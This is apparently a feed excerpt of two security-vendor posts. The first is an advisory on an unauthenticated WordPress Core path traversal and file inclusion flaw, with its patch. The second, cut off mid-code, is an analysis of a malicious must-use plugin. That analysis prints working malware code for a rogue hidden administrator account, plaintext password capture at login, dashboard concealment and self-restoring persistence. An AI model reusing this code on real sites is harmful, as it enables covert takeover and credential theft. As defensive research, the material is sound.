<div class="affected-versions">
					<span>Affected Version(s)</span><br />
											<strong>Various <span data-bs-toggle="tooltip" title="6.6 - 6.6.8; 6.7 - 6.7.8; 6.8 - 6.8.9; 6.9 - 6.9.8; 7.0 - 7.0.5; 7.1 - 7.1.1; 4.7 - 4.7.36; 4.8 - 4.8.31; 4.9 - 4.9.32; 5.0 - 5.0.28; 5.1 - 5.1.25; 5.2 - 5.2.27; 5.3 - 5.3.24; 5.4 - 5.4.22; 5.5 - 5.5.21; 5.6 - 5.6.20; 5.7 - 5.7.18; 5.8 - 5.8.16; 5.9 - 5.9.17; 6.0 - 6.0.15; 6.1 - 6.1.13; 6.2 - 6.2.12; 6.3 - 6.3.11; 6.4 - 6.4.11; 6.5 - 6.5.11"><i class="text-primary fas fa-info-circle"></i></span></strong>
									</div>
<div class="patched-status">
					<span>Patched Versions</span><br />
					<strong class="patched">4.7.37, 4.8.32, 4.9.33, 5.0.29, 5.1.26, 5.2.28, 5.3.25, 5.4.23, 5.5.22, 5.6.21, 5.7.19, 5.8.17, 5.9.18, 6.0.16, 6.1.14, 6.2.13, 6.3.12, 6.4.12, 6.5.12, 6.6.9, 6.7.9, 6.8.10, 6.9.9, 7.0.6, 7.1.2</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-ressl" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-ressl" target="_blank" rel="noopener">Robert Ressl</a></div>
</p></div>
</p></div>
</p></div>
<div class="vulnerability-description">
			WordPress Core is vulnerable to Local File Inclusion via the locate_template() function in various versions up to, and including, 7.1.1. The function resolved a caller-supplied template name against the theme directories without verifying the result stayed within them, so a template name containing &#8216;..&#8217; could resolve to a readable PHP file outside the active theme and be included. The core-reachable vector is get_page_template(), which builds page-{$pagename}.php from the URL-derived, url-decoded &#8216;pagename&#8217; query variable. This makes it possible for unauthenticated attackers to make page-template resolution include a chosen readable local .php file outside the theme directories, which under certain conditions can lead to remote code execution. Exploitation requires (1) the active parent or child theme to contain a top-level directory whose name begins with &#8216;page-&#8216; (e.g. &#8216;page-templates&#8217; in Twenty Twelve, Twenty Fourteen, Neve, Hestia, Sydney), and (2) a readable .php target on the server accessible to the web-server account (e.g. pearcmd.php with register_argc_argv=On, as in the official PHP Docker image and default cPanel setups on PHP &lt; 8.5), which yields RCE.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6ff76d9b-aa12-4391-90cd-f9df36d4a3a5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<p>We would like to thank Robert Ressl for discovering and responsibly disclosing this vulnerability, as well as the WordPress Security Team and Core contributors who developed, reviewed, tested, and backported the fix.</p>
<hr>
<h2>What Makes This Vulnerability Serious</h2>
<p>What makes this vulnerability serious is that it affects WordPress Core rather than a single optional plugin or theme. An attacker does not need to authenticate, convince an administrator to click a link, or find a separate privilege-escalation vulnerability before reaching the vulnerable page-template logic.</p>
<p>At the same time, it is important to describe the impact precisely. CVE-2026-87902 is not an unconditional remote code execution vulnerability on every unpatched WordPress site. The vulnerability first provides a path traversal and local PHP file inclusion primitive. Turning that primitive into code execution depends on the theme and server satisfying additional requirements.</p>
<p>The official advisory identifies two principal conditions:</p>
<ol>
<li>The active parent or child theme contains a top-level directory whose name begins with <code>page-</code>, such as <code>page-templates</code>.</li>
<li>A PHP file that can produce useful behavior when included exists locally and is readable by the web server account.</li>
</ol>
<p>The relevant directory layout exists in real themes. The WordPress advisory specifically cites the legacy Twenty Twelve and Twenty Fourteen themes, along with Neve, Hestia, and Sydney. Because the advisory does not identify affected theme-version ranges, administrators should verify the installed theme and filesystem rather than assume that every release bearing one of those names is exposed. The advisory also reports that the official PHP Docker image and default cPanel configurations using PHP before 8.5 can expose a known PEAR-based transition from local file inclusion to code execution.</p>
<p>Sites that do not meet those requirements may not be exploitable for remote code execution in their current configuration. That should not be treated as a durable mitigation. Themes, plugins, PHP packages, and server settings change over time, and the underlying unauthenticated path traversal remains present until WordPress Core is updated.</p>
<hr>
<h2>Technical Analysis</h2>
<p>WordPress uses a hierarchy of candidate files to decide which template should render a page. In vulnerable releases, <code>get_page_template()</code> reads the public <code>pagename</code> query variable and applies an additional URL-decoding operation before constructing a template candidate:</p>
<pre><code>$pagename_decoded = urldecode( $pagename );
$templates[]      = "page-{$pagename_decoded}.php";</code></pre>
<p>Request parameters have already been URL-decoded once by the time WordPress processes them. The extra <code>urldecode()</code> means an attacker can submit a doubly encoded value that becomes path traversal syntax only during page-template resolution.</p>
<p>WordPress then passes the candidate to <code>locate_template()</code>. In affected versions, that function joins the candidate to an active-theme path and checks whether the resulting file exists. It did not verify that the resolved file remained inside an approved theme directory before <code>load_template()</code> included it.</p>
<p>Together, these behaviors allow a crafted page request to escape a compatible <code>page-*</code> directory and point WordPress toward a PHP file elsewhere on the local filesystem. WordPress adds the <code>page-</code> prefix and <code>.php</code> suffix itself, which is why the theme layout and target-file requirements matter.</p>
<p>Our end-to-end validation reproduced the behavior on WordPress 7.1.</p>
<hr>
<h2>How the Patch Works</h2>
<p>The <a href="https://core.trac.wordpress.org/changeset/63792" target="_blank" rel="noopener noreferrer">WordPress fix</a> adds two complementary protections.</p>
<p>First, <code>get_page_template()</code> now checks the decoded page name with <code>validate_file()</code> before adding it to the template candidate list. This rejects the traversal syntax used through the vulnerable <code>pagename</code> path.</p>
<p>Second, <code>locate_template()</code> now sends existing candidates through a new <code>_wp_is_template_path_allowed()</code> check. For a path containing traversal components, WordPress resolves its canonical filesystem location and confirms that it remains inside an approved theme or theme-compatibility directory before it can be loaded.</p>
<p>The first control closes the known request path. The second adds defense in depth for other Core callers and filters that can provide template names.</p>
<hr>
<h2>Who Is Affected</h2>
<p>The vulnerable and fixed ranges are branch-specific. A simple statement such as “WordPress 7.1.1 and earlier” would be inaccurate because the September 22 security backports are fixed even though their version numbers sort below 7.1.1.</p>
<div>
<table>
<thead>
<tr>
<th scope="col">Affected versions</th>
<th scope="col">Update to</th>
</tr>
</thead>
<tbody>
<tr>
<td>7.1.0 through 7.1.1</td>
<td><strong>7.1.2</strong></td>
</tr>
<tr>
<td>7.0.0 through 7.0.5</td>
<td><strong>7.0.6</strong></td>
</tr>
<tr>
<td>6.9.0 through 6.9.8</td>
<td><strong>6.9.9</strong></td>
</tr>
<tr>
<td>6.8.0 through 6.8.9</td>
<td><strong>6.8.10</strong></td>
</tr>
<tr>
<td>6.7.0 through 6.7.8</td>
<td><strong>6.7.9</strong></td>
</tr>
<tr>
<td>6.6.0 through 6.6.8</td>
<td><strong>6.6.9</strong></td>
</tr>
<tr>
<td>6.5.0 through 6.5.11</td>
<td><strong>6.5.12</strong></td>
</tr>
<tr>
<td>6.4.0 through 6.4.11</td>
<td><strong>6.4.12</strong></td>
</tr>
<tr>
<td>6.3.0 through 6.3.11</td>
<td><strong>6.3.12</strong></td>
</tr>
<tr>
<td>6.2.0 through 6.2.12</td>
<td><strong>6.2.13</strong></td>
</tr>
<tr>
<td>6.1.0 through 6.1.13</td>
<td><strong>6.1.14</strong></td>
</tr>
<tr>
<td>6.0.0 through 6.0.15</td>
<td><strong>6.0.16</strong></td>
</tr>
<tr>
<td>5.9.0 through 5.9.17</td>
<td><strong>5.9.18</strong></td>
</tr>
<tr>
<td>5.8.0 through 5.8.16</td>
<td><strong>5.8.17</strong></td>
</tr>
<tr>
<td>5.7.0 through 5.7.18</td>
<td><strong>5.7.19</strong></td>
</tr>
<tr>
<td>5.6.0 through 5.6.20</td>
<td><strong>5.6.21</strong></td>
</tr>
<tr>
<td>5.5.0 through 5.5.21</td>
<td><strong>5.5.22</strong></td>
</tr>
<tr>
<td>5.4.0 through 5.4.22</td>
<td><strong>5.4.23</strong></td>
</tr>
<tr>
<td>5.3.0 through 5.3.24</td>
<td><strong>5.3.25</strong></td>
</tr>
<tr>
<td>5.2.0 through 5.2.27</td>
<td><strong>5.2.28</strong></td>
</tr>
<tr>
<td>5.1.0 through 5.1.25</td>
<td><strong>5.1.26</strong></td>
</tr>
<tr>
<td>5.0.0 through 5.0.28</td>
<td><strong>5.0.29</strong></td>
</tr>
<tr>
<td>4.9.0 through 4.9.32</td>
<td><strong>4.9.33</strong></td>
</tr>
<tr>
<td>4.8.0 through 4.8.31</td>
<td><strong>4.8.32</strong></td>
</tr>
<tr>
<td>4.7.0 through 4.7.36</td>
<td><strong>4.7.37</strong></td>
</tr>
</tbody>
</table>
</div>
<p>WordPress.org states that only the newest release in the 7.1 series is actively maintained. The older fixes were supplied as courtesy security backports. Sites on an older branch should apply the available security update immediately and plan an upgrade to a currently maintained WordPress release.</p>
<hr>
<h2>Wordfence Protection</h2>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener noreferrer">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener noreferrer">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener noreferrer">Wordfence Response</a> customers received firewall protection against attacks targeting CVE-2026-87902 on <strong>September 22, 2026</strong>, the same day the vulnerability and security updates were released. Wordfence Free users will receive the same protection on <strong>October 22, 2026</strong>.</p>
<p>The dedicated firewall rule detects traversal syntax in the vulnerable <code>pagename</code> input, including the encoded form that remains after the web application firewall’s first decoding pass.</p>
<p>As always, the firewall is an important layer of protection, but it is not a substitute for patching WordPress Core. Site owners should update even after firewall protection is active.</p>
<hr>
<h2>What Site Owners Should Do Now</h2>
<p>If you manage a WordPress site, take the following steps immediately:</p>
<div>
<div>
    <span>1</span></p>
<div>Check the WordPress Core version on every site you manage.</div>
</div>
<div>
    <span>2</span></p>
<div>Update to <strong>WordPress 7.1.2</strong> or to the fixed release listed above for your current branch.</div>
</div>
<div>
    <span>3</span></p>
<div>Confirm that the update completed. Do not assume an automatic background update succeeded on every site.</div>
</div>
<div>
    <span>4</span></p>
<div>If immediate updating is temporarily impossible, confirm that an appropriate firewall rule is active, then schedule the Core update as soon as possible.</div>
</div>
<div>
    <span>5</span></p>
<div>Review web server and firewall logs for suspicious requests containing traversal-like values in the <code>pagename</code> parameter.</div>
</div>
<div>
    <span>6</span></p>
<div>If you find evidence that a request reached the vulnerable template path, treat the site as potentially compromised. Review administrator accounts, recently installed or modified plugins, scheduled tasks, and unexpected PHP files, and begin a full incident response process.</div>
</div>
</div>
<hr>
<h2>Conclusion</h2>
<p>CVE-2026-87902 is a serious WordPress Core vulnerability because it is reachable without authentication and can cross a theme-directory boundary to include local PHP code. On sites with a compatible theme layout and server environment, successful exploitation can lead to remote code execution and full site compromise.</p>
<p>The environmental requirements mean that not every vulnerable WordPress installation is immediately exploitable for code execution. They do not make it safe to remain on an affected release. The correct remediation is to update WordPress Core to the fixed version for your branch and confirm that the update completed.</p>
<p>Wordfence Premium, Care, and Response customers received firewall protection on September 22, 2026, and Wordfence Free users will receive the same protection on October 22, 2026. Patching remains the most important step site owners can take.</p>
<p><strong>If you have not already verified that your sites are running WordPress 7.1.2 or the appropriate September 22 security backport, do that now.</strong></p>
<div>
<p>If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener noreferrer">Wordfence Care</a>.</p>
<p><strong>If you need your site cleaned immediately,</strong> <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener noreferrer">Wordfence Response</a> offers the same service with 24/7/365 availability and a 1-hour response time. Both products include hands-on support if you need further assistance.</p>
</div>
<hr>
<h2>Primary Sources</h2>
<ul>
<li><a href="https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-7hp8-65ch-5whp" target="_blank" rel="noopener noreferrer">WordPress Core security advisory GHSA-7hp8-65ch-5whp</a></li>
<li><a href="https://core.trac.wordpress.org/changeset/63792" target="_blank" rel="noopener noreferrer">WordPress Core changeset 63792</a></li>
<li><a href="https://wordpress.org/download/releases/" target="_blank" rel="noopener noreferrer">WordPress release archive</a></li>
</ul>
</div>
<p>The post <a href="https://www.wordfence.com/blog/2026/09/psa-critical-unauthenticated-path-traversal-vulnerability-patched-in-wordpress-core/" target="_blank" rel="noopener">PSA: Critical Unauthenticated Path Traversal Vulnerability Patched in WordPress Core</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Inside a Malicious, Stealthy WordPress Must Use Plugin</title>
		<link>https://swiftupdates.ca/inside-a-malicious-stealthy-wordpress-must-use-plugin/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Tue, 22 Sep 2026 15:39:46 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/inside-a-malicious-stealthy-wordpress-must-use-plugin/</guid>

					<description><![CDATA[The Wordfence Threat Intelligence Team identified an interesting malware sample in mid June during a site clean. The malware was installed as a must-use plugin with several self-healing mechanisms in place in order to survive removal. It also makes use of Etherhiding, a technique that hides the location of the attacker’s servers behind a smart [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>The Wordfence Threat Intelligence Team identified an interesting malware sample in mid June during a site clean. The malware was installed as a must-use plugin with several self-healing mechanisms in place in order to survive removal. It also makes use of Etherhiding, a technique that hides the location of the attacker’s servers behind a smart contract on the Ethereum blockchain, making the command channel resilient to takedown..</p>
<p>A malware detection signature was developed and released after undergoing our Q&amp;A process on June 23rd 2026. All <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> customers received this signature immediately. Users of the free versions of Wordfence received the same signatures after the standard 30-day delay.</p>
<p>As part of our product lineup, we offer security monitoring and malware removal services for our <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a> and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> customers. In the event of a security incident, our incident response team will investigate the root cause, find and remove malware from your site, and help with other complications that may arise as a result of an infection. During the cleanup, malware samples are added to our Threat Intelligence database, which contains over 4.4 million unique malicious samples. The Wordfence plugin scanner detects over 99% of these samples and indicators of compromise, when using the premium signature set.</p>
<h2>Introduction</h2>
<p>WordPress malware is often designed to stay hidden, but its effects eventually surface through site defacement, redirects, card skimming, or spam. Today we will look at a malware sample that was installed as a must-use plugin, disguised as an automated health check and reporting tool with a plausible author name and a link to a code repository.</p>
<p>Across our detections, samples appeared under more than 4,000 distinct filenames. The most common were legitimate-looking WordPress filenames such as the <code>advanced-cache.php</code> and <code>db.php</code> drop-ins and a theme’s <code>functions.php</code>. The Plugin Name, Author, and Plugin URI fields also vary between samples, making such metadata unreliable indicators for detection.</p>
<p>Must-use plugins load automatically on every WordPress request and cannot be deactivated from the standard Plugins screen. This makes them useful for legitimate site-wide functionality, but also attractive to attackers as it provides an ideal location for persistent malware.</p>
<p>Nearly every component of this malware aims to either avoid detection or survive removal attempts to help it achieve its primary goal of exfiltrating data.</p>
<p>The sections below explain how those capabilities work and what defenders and site owners should look for.</p>
<h2>Defense Evasion</h2>
<p>The malware relies on several techniques to make analysis more difficult and reduce the chances of an administrator noticing it after installation.</p>
<h3>Custom string obfuscation</h3>
<p>Many WordPress malware families use familiar patterns such as <code>eval(base64_decode(...))</code> that are easy to spot during analysis. The obfuscation technique used in this sample is different.</p>
<p>WordPress API calls such as <code>add_action()</code> and <code>get_option()</code> are visible, but the values passed to them such as hook names, option names, constants, and file paths are hidden behind a custom string decoder. The malware reconstructs them only when they are needed.</p>
<p>The obfuscation is built around two functions. The first, <code>dc9fwkk9hi2kpyfq()</code>, stores a large lookup table of encoded strings. The second, <code>ppv3f3iem95sraou()</code>, retrieves one of those strings, decodes it back into its original value for use at runtime.</p>
<pre class="brush: php; title: ; notranslate">
function ppv3f3iem95sraou($i){
    // Look up the scrambled string at index $i from the table
    $e = dc9fwkk9hi2kpyfq($i);

    // The "real" alphabet, assembled from fragments
    $f = 'AB'.'SPT'.'H3.1'.'0W'.'MU_L'.'GIN'.'DR/'.'mu'.'-p'.'lgin'.'sc'.'ro'.'fe'
       .'thay'.'dwj'.'x9'.'475'.'2C86'.'bFE:'.'kz?'.'=vXY'.'ZVQq'.'* O{'.'","['
       .'}]\'.'#^@'.'+()''.'|K'.'&lt;&gt;!;'.'$J&amp;'.'%`';

    // The "scrambled" alphabet, aligned character-for-character with $f
    $t = '?,{z'.'SoF'.')D'.'s*&amp;8'.'h"\'.'5$py'.'TN:'.'!W4'.'g'ld'.'mi'.'I#w|'
       .'Xe'.'2qM'.'U;'.'_J'.'b}C'.'17k]'.'9&lt;'.'ucQ'.'Z&gt;0'.'-K'.'@v'.'=a`'.'RB(3'
       .' .'.'Hx^'.'jY%['.'nrA'.'+GLV'.'6ft'.'PE/O';

    $r = "";
    for ($j = 0; $j &lt; strlen($e); $j++) {
        // Find where this character sits in the scrambled alphabet
        $p = strpos($t, $e[$j]);

        // Swap in the character at the same position in the real alphabet
        // (characters not found in $t are left unchanged)
        $r .= ($p === false) ? $e[$j] : $f[$p];
    }

    return $r;
}
</pre>
<p>The decoding trick is a simple substitution cipher. The two alphabets, <code>$t</code> (scrambled) and <code>$f</code> (real), are lined up character for character. For each character in the stored string, the code finds its position in <code>$t</code> and swaps in the character at the same position in <code>$f</code>.</p>
<p><b>Scrambled alphabet ($t)</b></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-43093 size-full" src="https://www.wordfence.com/wp-content/uploads/2026/09/Scrambled.png" alt="Scrambled" width="1280" height="426"></p>
<p><b>Real alphabet ($f)</b></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-43094 size-full" src="https://www.wordfence.com/wp-content/uploads/2026/09/Real.png" alt="Real" width="1284" height="424"></p>
<p>The string <code>gw|hIW|'Il</code> decodes to <code>get_option:</code></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-43092 size-full" src="https://www.wordfence.com/wp-content/uploads/2026/09/string_example.png" alt="" width="750" height="210"></p>
<p>Additionally, some SQL statements in the malware are hidden by replacing individual characters with hexadecimal codes. PHP interprets these correctly at run time, so the database queries execute normally.</p>
<pre class="brush: php; title: ; notranslate">
"x55Px44x41x54x45"    // PHP reads this as: UPDATE
</pre>
<h3>Hiding the plugin from the WordPress Dashboard</h3>
<p>Running as a must-use plugin keeps it off the standard plugins list, but the malware goes further. It hooks several filters and uses additional techniques to hide itself from multiple areas of the WordPress dashboard, including the Must-Use Plugins view, the standard Plugins page, update notifications, and the Site Health screen.</p>
<p>One of the filters hooks <code>show_advanced_plugins</code> and removes the malicious plugin from the list of must use plugins before WordPress renders the page.</p>
<pre class="brush: php; title: ; notranslate">
add_filter('show_advanced_plugins', 'jw9g34on8dpql8no1dkod', 10, 2);
function jw9g34on8dpql8no1dkod($cqjitdalw5w, $ltcait84rh4) {
    if ($ltcait84rh4 !== 'mustuse') {
        return $cqjitdalw5w;
    }
    $plugins = &amp;$GLOBALS['plugins'];
    $kc79l0t0g42edmq = basename(__FILE__);
    if (isset($plugins['mustuse'][$kc79l0t0g42edmq])) {
        unset($plugins['mustuse'][$kc79l0t0g42edmq]);
    }
    return $cqjitdalw5w;
}
</pre>
<h2>Persistence Mechanisms</h2>
<p>The malware layers several persistence mechanisms, so removing one component does not necessarily remove the infection.</p>
<h3>Establishing administrator access</h3>
<p>Access is only useful if it is persistent. The simplest way to maintain persistence is to create a valid administrator account, which is where the malware starts.</p>
<p>First, it checks whether it has already created an admin account by reading a username from an option it stores under the key <code>bu</code>.</p>
<pre class="brush: php; title: ; notranslate">
$uy41z25nzuvbz8q = (string) a09ip7sgac4aqyl1gr5('bu', "");   // read the stored username
if ($uy41z25nzuvbz8q !== "" &amp;&amp; username_exists($uy41z25nzuvbz8q)) {
    return;
}
</pre>
<p>If a target account exists, it resets the account’s password and adopts its login, leaving the total user count unchanged.</p>
<pre class="brush: php; title: ; notranslate">
$neg_bxukbigzkesp = hes7nz5xurjrv9odym($mko7yu73g8fs);   // find a target account
if ($neg_bxukbigzkesp) {
    $uy41z25nzuvbz8q = $neg_bxukbigzkesp-&gt;user_login; // use the existing account's username
    wp_set_password($bbg47x_p9re7tr9, $neg_bxukbigzkesp-&gt;ID); // reset account password
}
</pre>
<p>If no account exists yet, it builds a username. The name is assembled from a small pool of prefixes and a random suffix.</p>
<p>One of four prefixes is selected at random and joined to a six-character suffix, producing a different username for each installation. The account is then created with the <code>administrator</code> role and a randomly generated password. The snippet below shows an admin account found during one of the site cleans:</p>
<p><img decoding="async" loading="lazy" class="alignnone wp-image-43104 size-full" src="https://www.wordfence.com/wp-content/uploads/2026/09/admin_example.png" alt="" width="655" height="62"></p>
<p>The username and password are written back to the malware’s own options, <code>bu</code> and <code>bp</code>, for retrieval.</p>
<pre class="brush: php; title: ; notranslate">
// Build a username from a random prefix and a 6-char suffix
function r_fixeq0d4tjktrcok9() {
    return array('admin_', 'adm_', 'administrator_', 'backup_');   // prefix pool
}

$qck3frd1bv59 = r_fixeq0d4tjktrcok9();
$uy41z25nzuvbz8q = $qck3frd1bv59[array_rand($qck3frd1bv59)] . tosdjo7gpra3klx3tp6wd(6);  // random prefix + 6-char suffix

// Create the account with the administrator role
$c4rjb5mmcw = wp_insert_user(array(
    'user_login'   =&gt; $uy41z25nzuvbz8q,
    'user_pass'    =&gt; $bbg47x_p9re7tr9,
    'user_email'   =&gt; $lnqf7q_c5_phj,
    'role'         =&gt; 'administrator',
    'display_name' =&gt; $uy41z25nzuvbz8q,
));

// Store the credentials in the malware's own options for retrieval
mn_fq_b5727vul9('bu', $uy41z25nzuvbz8q, 'no');
mn_fq_b5727vul9('bp', $bbg47x_p9re7tr9, 'no');
</pre>
<h3>Hiding the rogue administrator account</h3>
<p>A rogue administrator account would be conspicuous and easy to spot, so the malware removes its account from the places WordPress would display it. It hooks three filters.</p>
<pre class="brush: php; title: ; notranslate">
add_filter('pre_user_query', '_3iph65h6h4ay59m');
add_filter('rest_user_query', 'ba5ymmrv_5gmwer5hmxs', 10, 2);
add_filter('views_users', 'v3x05n_z__nui2mx_uwg19');
</pre>
<p>The first modifies the query WordPress runs before listing users. The handler reads the stored username from <code>bu</code> and appends a condition excluding the malicious admin account from the result before WordPress displays the Users page.</p>
<pre class="brush: php; title: ; notranslate">
function _3iph65h6h4ay59m($vu7n2q10t7pbi) {
    if (!is_object($vu7n2q10t7pbi) || !property_exists($vu7n2q10t7pbi, 'query_where')) {
        return $vu7n2q10t7pbi;
    }
    $uy41z25nzuvbz8q = (string) a09ip7sgac4aqyl1gr5('bu', "");   // read the stored username
    if (!$uy41z25nzuvbz8q) {
        return $vu7n2q10t7pbi;
    }
    $xqtbnr94eyyx = esc_sql($uy41z25nzuvbz8q);
    if (strpos($vu7n2q10t7pbi-&gt;query_where, $xqtbnr94eyyx) === false) {
        // append a condition excluding the hidden account from the query
        $vu7n2q10t7pbi-&gt;query_where .= " AND user_login != '" . $xqtbnr94eyyx . "'";
    }
    return $vu7n2q10t7pbi;
}
</pre>
<p>The second handler applies the same exclusion to the REST API, so the account is also hidden from REST API requests. It uses the REST API’s <code>login__not_in</code> parameter.</p>
<pre class="brush: php; title: ; notranslate">
function ba5ymmrv_5gmwer5hmxs($nzzxff8oo5wcnksk, $gtm3jw_uj6w26f1) {
    $uy41z25nzuvbz8q = (string) a09ip7sgac4aqyl1gr5('bu', "");   // read the stored username
    if ($uy41z25nzuvbz8q === "") {
        return $nzzxff8oo5wcnksk;
    }
    if (!is_array($nzzxff8oo5wcnksk)) {
        return $nzzxff8oo5wcnksk;
    }
    if (!isset($nzzxff8oo5wcnksk['login__not_in']) || !is_array($nzzxff8oo5wcnksk['login__not_in'])) {
        $nzzxff8oo5wcnksk['login__not_in'] = array();
    }
    if (!in_array($uy41z25nzuvbz8q, $nzzxff8oo5wcnksk['login__not_in'], true)) {
        $nzzxff8oo5wcnksk['login__not_in'][] = $uy41z25nzuvbz8q;   // add it to login__not_in so REST excludes it
    }
    return $nzzxff8oo5wcnksk;
}
</pre>
<p>Removing a user from a list leaves an inconsistency, because the role counts above it still include the hidden account. The third handler corrects that.</p>
<p>It subtracts one from the counts displayed in the “All” and “Administrator” links, making the totals appear consistent with the filtered user list. An administrator viewing the Users page sees a list with the account missing and a total that matches. Because the malware hides the account from both the dashboard and REST API user listings, inspecting the database directly is the reliable way to see the account.</p>
<pre class="brush: php; title: ; notranslate">
function v3x05n_z__nui2mx_uwg19($n2ofmk_5rsvpou0j) {
    $vua00bhbm7rq_26 = (string) a09ip7sgac4aqyl1gr5('bu', "");   // read the stored username
    if (!$vua00bhbm7rq_26) {
        return $n2ofmk_5rsvpou0j;
    }
    $_2uz20ub4i2 = array('all', 'administrator');
    foreach ($_2uz20ub4i2 as $key) {
        if (isset($n2ofmk_5rsvpou0j[$key]) &amp;&amp; preg_match('/((d+))/', $n2ofmk_5rsvpou0j[$key], $zmjk775po4wb793)) {
            $j_afs7sjsswkr1n = max(0, (int) $zmjk775po4wb793[1] - 1);   // subtract 1 to account for the hidden user
            $n2ofmk_5rsvpou0j[$key] = preg_replace('/(d+)/', '(' . $j_afs7sjsswkr1n . ')', $n2ofmk_5rsvpou0j[$key]);
        }
    }
    return $n2ofmk_5rsvpou0j;
}
</pre>
<h3>Harvesting administrator passwords</h3>
<p>The malware hooks WordPress’s <code>authenticate</code> filter, which fires after every login. The handler receives the authenticated user object, the username, and the plaintext password directly from WordPress. It acts only on administrator accounts, storing the plaintext password in an option named <code>ic</code>, keyed by username.</p>
<pre class="brush: php; title: ; notranslate">
add_filter('authenticate', 'y7f21q85ss7nf7_rq', 999, 3);
function y7f21q85ss7nf7_rq($rbbh2yydrh6, $uy41z25nzuvbz8q, $bbg47x_p9re7tr9) {
    if (!is_object($rbbh2yydrh6) || !method_exists($rbbh2yydrh6, 'has_cap')) {
        return $rbbh2yydrh6;
    }
    if (!$rbbh2yydrh6-&gt;has_cap('administrator')) {
        return $rbbh2yydrh6;   // administrators only
    }
    if (!is_string($bbg47x_p9re7tr9) || !$bbg47x_p9re7tr9) {
        return $rbbh2yydrh6;
    }
    $zzbsiakc69dcssg = a09ip7sgac4aqyl1gr5('ic', array());   // read stored passwords
    if (!is_array($zzbsiakc69dcssg)) $zzbsiakc69dcssg = array();
    $zzbsiakc69dcssg[$rbbh2yydrh6-&gt;user_login] = $bbg47x_p9re7tr9;   // store plaintext password
    mn_fq_b5727vul9('ic', $zzbsiakc69dcssg, 'no');                    // write back to the database
    return $rbbh2yydrh6;
}
</pre>
<h3>Self-healing</h3>
<p>The malware registers its restore routine on <code>plugins_loaded</code> at priority <code>0</code>, causing it to run early on every WordPress request. A transient limits the check to once per hour. If the plugin file is missing or smaller than 5,000 bytes, the routine retrieves a stored copy from the <code>src</code> option and writes it back to disk.</p>
<p>The <code>touch()</code> backdates the modification time and changes the file mode to <code>0444</code>, making the restored file appear older and read-only.</p>
<pre class="brush: php; title: ; notranslate">
if (get_transient('sc_recover_check')) {
    return;
}
set_transient('sc_recover_check', 1, 3600);          // throttle to once per hour

$size = @filesize(__FILE__);
if ($size &amp;&amp; $size &gt; 5000) {
    return;                                           // file intact, nothing to do
}

$rfeqio6uzj = a09ip7sgac4aqyl1gr5('src', "");        // read the saved source from the database
if ($rfeqio6uzj &amp;&amp; is_string($rfeqio6uzj)) {
    @chmod(__FILE__, 0644);                           // make the file writable
    @file_put_contents(__FILE__, $rfeqio6uzj);        // write the source back to disk
    @touch(__FILE__, dw9_2yhlyjj8r4k_uq81());         // backdate the modification time
    @chmod(__FILE__, 0444);                           // make it read-only again
}
</pre>
<h3>Self-reactivation</h3>
<p>The plugin writes itself back into the <code>active_plugins</code> option directly, bypassing WordPress’s normal plugin activation process. It reads the database name and table prefix from <code>wp-config.php</code>, then updates the option under a locked transaction. This mechanism applies to copies placed in the standard <code>wp-content/plugins</code>.</p>
<pre class="brush: php; title: ; notranslate">
// Read the site's wp-config.php (checks the parent directory as a fallback)
$x04jsznnetwaalcj = $wt5gbjojfzrk . '/wp-config.php';
if (! @is_file($x04jsznnetwaalcj)) {
    $x04jsznnetwaalcj = dirname($wt5gbjojfzrk) . '/wp-config.php';
}
$t5bdda4_0m = @file_get_contents($x04jsznnetwaalcj);

// Extract DB name and prefix; each is saved before the next match reuses the array
$shrtpjcg2yv = $prefix = "";
if (preg_match('/defines*(s*['"]DB_NAME['"]s*,s*['"]([^'"]+)['"]/', $t5bdda4_0m, $zmjk775po4wb793)) {
    $shrtpjcg2yv = $zmjk775po4wb793[1];
}
if (preg_match('/table_prefixs*=s*['"]([^'"]+)['"]/', $t5bdda4_0m, $zmjk775po4wb793)) {
    $prefix = $zmjk775po4wb793[1];
}

// Build the qualified options table from the sanitised DB name, then append itself under a row lock
$fhgzkfss6eygrbu8 = preg_replace('/[^a-zA-Z0-9_]/', "", $shrtpjcg2yv);
